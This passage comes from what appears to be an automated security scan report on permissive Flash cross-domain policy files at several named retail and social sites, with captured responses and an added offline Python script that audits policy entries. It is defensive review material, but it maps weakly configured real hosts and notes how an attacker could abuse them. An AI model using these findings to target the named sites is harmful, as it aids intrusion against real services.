   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.66. https://ordering.ftd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy that trusts two wildcard patterns, *.ftd.com and *.ftdimg.com, plus further named domains (truncated in the response above).

Using a wildcard means that any host under those patterns can perform two-way interaction with this application from a Flash object, with the user's ordering.ftd.com cookies attached. Because the policy is served over https and the entries omit the secure attribute (which defaults to true), only SWFs loaded from https origins under those patterns qualify, which is the right default for an ordering host. You should only use this policy if you fully trust every web site that may reside under those patterns. Note that the policy response itself sets TLTSID and TLTUID cookies with Domain=.ftd.com, so those cookies are already visible to the same set of hosts the wildcard admits.

Allowing access from specific named domains grants the same two-way access to those hosts only. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ordering.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:00 GMT
Server: Apache
Set-Cookie: TLTSID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 02:10:00 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.67. http://pet.imageg.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pet.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy that trusts wildcard patterns (*.petsmart.com, *.gspt.net, *.gsipartners.com), several named hosts, and four bare IP addresses.

Using a wildcard means that any host under those patterns can perform two-way interaction with this application from a Flash object. You should only use this policy if you fully trust every web site that may reside under those patterns. The entries carry secure="true", but that attribute only governs policy files served over https; this one is fetched over plain http, so the attribute has no effect here.

Allowing access from specific named domains and IP addresses grants the same access to those hosts only, and should be limited to hosts you fully trust. Two of the addresses, 172.20.1.172 and 172.21.1.172, fall in the RFC 1918 private range 172.16.0.0/12; such entries are only usable from inside that network and disclose internal addressing in a public file, so confirm they are still needed.

Request

GET /crossdomain.xml HTTP/1.0
Host: pet.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:49:57 GMT
Date: Mon, 16 May 2011 10:49:57 GMT
Content-Length: 781
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.68. http://rya.rockyou.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rya.rockyou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy that trusts wildcard patterns over its own domains (*.rockyou.com, *.rockmyspace.com, *.rockyou-internal.com, the *.rockyoucdn1-4.com CDN names) and over third parties (*.meebo.com, *.ministryofwar.com, *.yahoo.net, *.yimg.com), plus named hosts such as api.msappspace.com and the mochiads.com and mochimedia.com sites.

Using a wildcard means that any host under those patterns can perform two-way interaction with this application from a Flash object. You should only use this policy if you fully trust every web site that may reside under those patterns; for a third-party wildcard that trust extends to the whole of the third party's estate, including hosts it adds later.

Allowing access from specific named domains grants the same access to those hosts only, and should be limited to hosts you fully trust. Two further attributes in this file deserve review. The site-control element sets permitted-cross-domain-policies="all", which lets any URL on rya.rockyou.com be loaded as a policy file through Security.loadPolicyFile; if any path on the host serves attacker-influenced content, that content could be used as a policy of the attacker's choosing, so check whether such a path exists. Most entries also carry to-ports="*", which only matters if this same file is served as a socket policy, in which case it permits socket connections to every port.

Request

GET /crossdomain.xml HTTP/1.0
Host: rya.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
Last-Modified: Wed, 06 Apr 2011 23:33:16 GMT
ETag: "4ff-4a0486ac18700"
Accept-Ranges: bytes
Content-Length: 1279
Vary: Accept-Encoding,User-Agent
X-RyHeader: www114.rockyou.com took D=104 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.rockmyspace.com" to-ports="*" />
<allow-access-from domain="*.rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockmyspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.meebo.com" to-ports="*" />
<allow-access-from domain="*.rockyou-internal.com" to-ports="*" />
<allow-access-from domain="*.ministryofwar.com" to-ports="*"/>
<allow-access-from domain="api.msappspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="x.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochimedia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn1.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn2.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn4.com" to-ports="*" />
...[SNIP]...

6.69. http://s7.orientaltrading.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s7.orientaltrading.com
Path:   /crossdomain.xml

Issue detail

The application publishes a 25 KB Flash cross-domain policy (Content-Length: 25343) that trusts well over a hundred wildcard patterns and named hosts belonging to many unrelated retailers, agencies and staging environments. The scene7.com entries and the s7 host name indicate a shared image-serving platform whose policy is common to all of its customers rather than one written for orientaltrading.com alone.

Using a wildcard means that any host under those patterns can perform two-way interaction with this application from a Flash object. You should only use this policy if you fully trust every web site that may reside under those patterns. The *.cloudfront.net entry is the widest: names under that domain are handed out to any CloudFront customer, so the pattern trusts anyone who sets up a distribution. Several wildcards also fall outside the documented *.example.com form (*.*.fds.com, *.*.macys.com, *flashmaxx.com, .allurent.net), and their handling by Flash Player should be verified rather than assumed.

Allowing access from specific named domains grants the same access to those hosts only, and should be limited to hosts you fully trust. Before the trust question can even be reviewed, the list needs pruning: it contains 127.0.0.1 and RFC 1918 addresses (10.80.1.144, 10.80.1.152, 10.80.1.42), host:port values (agpmt-prod:7778, agpmt-test:7777), names with stray whitespace (" s7.sears.com ", "stage.homeinspiration.homedepot.com ", "*.teamworkathletic.com "), none of which are well-formed domain entries, and repeated lines such as ag2010.stage.ascedia.com, *.burton.com, *.ridesnowboards.com, *.criticalmass.com, *.theodorealexander.com, s7demo.host.adobe.com and store.americangirl.com. Dead entries cost nothing by themselves, but they show a file that is appended to and never pruned, which is how stale trust accumulates.
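
The five findings in this group (6.65 to 6.69) come down to one review task: read every allow-access-from entry and decide which ones grant more than intended. The script below is an added example and is not part of the scanner output or of any vendor's tooling. It parses a policy body with the standard library and flags the patterns visible in the responses above: a permissive site-control, wildcards (with a harsher verdict for wildcards over shared hosting), secure="false" on an https-served policy, to-ports="*", loopback and private IP entries, and entries that are not well-formed domains. SAMPLE_POLICY is constructed for the example and modelled on lines from the 6.68 and 6.69 responses; the severity labels, the SHARED_HOSTING_SUFFIXES list and the strict hostname regex are assumptions made for this example, not anything the scanner defines.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Constructed sample, modelled on entries seen in the 6.68 and 6.69 responses;
# it is not a verbatim copy of any policy on this page.
SAMPLE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*.rockyou.com" to-ports="*" />
  <allow-access-from domain="*.macys.com" secure="false"/>
  <allow-access-from domain="127.0.0.1" secure="true"/>
  <allow-access-from domain="10.80.1.144"/>
  <allow-access-from domain="*.cloudfront.net"/>
  <allow-access-from domain=" s7.sears.com "/>
  <allow-access-from domain="agpmt-prod:7778"/>
  <allow-access-from domain="www.petsmart.com" secure="true" />
</cross-domain-policy>
"""

# Suffixes under which unrelated parties can obtain a hostname, so a wildcard
# over them trusts strangers. Assumed starting list; extend it for your estate.
SHARED_HOSTING_SUFFIXES = {"cloudfront.net", "amazonaws.com", "edgesuite.net"}

# One optional leading "*." label, then ordinary DNS labels. Anything else
# (embedded ports, spaces, "*.*." or "*name") is reported as malformed.
HOSTNAME_RE = re.compile(r"^(\*\.)?([a-z0-9-]+\.)*[a-z0-9-]+$", re.IGNORECASE)


def _as_ip(value):
    """Return an ip_address object if value is an IP literal, else None."""
    try:
        return ipaddress.ip_address(value)
    except ValueError:
        return None


def audit_policy(xml_text, served_over_https=False):
    """Return a list of (severity, message) findings for one crossdomain.xml body.

    served_over_https: True when the policy was fetched from an https:// URL;
    the secure attribute is only meaningful in that case.
    """
    findings = []
    # expat does not fetch the external DTD named in the DOCTYPE, so parsing a
    # policy collected from a third-party host makes no network request.
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("high", "root element is <%s>, not <cross-domain-policy>" % root.tag)]

    site_control = root.find("site-control")
    if site_control is not None:
        if site_control.get("permitted-cross-domain-policies", "") == "all":
            findings.append(("medium",
                'site-control "all": any URL on this host may be loaded as a policy '
                'file; check whether any path serves user-supplied content'))

    for entry in root.findall("allow-access-from"):
        domain = entry.get("domain")
        if domain is None:
            findings.append(("low", "allow-access-from without a domain attribute"))
            continue

        # secure="false" on an https policy lets plain-http SWFs read https responses.
        if served_over_https and entry.get("secure", "true").lower() == "false":
            findings.append(("medium", '%r: secure="false" on an https-served policy' % domain))
        # to-ports is only honoured when the file is used as a socket policy.
        if entry.get("to-ports") == "*":
            findings.append(("low", '%r: to-ports="*" (matters only as a socket policy)' % domain))

        ip = _as_ip(domain)
        if ip is not None:
            if ip.is_loopback or ip.is_private:
                findings.append(("info", "%r: loopback/private address left in a public policy" % domain))
            continue

        if domain == "*":
            findings.append(("high", 'domain="*": every origin gets two-way access'))
            continue
        if domain != domain.strip() or not HOSTNAME_RE.match(domain):
            findings.append(("info", "%r: not a well-formed domain entry; likely dead or mistyped" % domain))
            continue
        if domain.startswith("*."):
            if domain[2:].lower() in SHARED_HOSTING_SUFFIXES:
                findings.append(("high", "%r: wildcard over shared hosting trusts anyone with a name under it" % domain))
            else:
                findings.append(("medium", "%r: wildcard trusts every present and future host under it" % domain))
    return findings


def summarize(findings):
    """Count findings per severity label."""
    counts = {}
    for severity, _ in findings:
        counts[severity] = counts.get(severity, 0) + 1
    return counts


if __name__ == "__main__":
    for severity, message in audit_policy(SAMPLE_POLICY, served_over_https=True):
        print("[%s] %s" % (severity, message))
```

Run it against each body captured above by passing the response body as xml_text and setting served_over_https to match the request scheme (True for 6.66, False for the others); the scanner's single Low rating then separates into the handful of entries actually worth raising with the owner.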

Request

GET /crossdomain.xml HTTP/1.0
Host: s7.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 11:58:49 GMT
Date: Mon, 16 May 2011 01:58:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
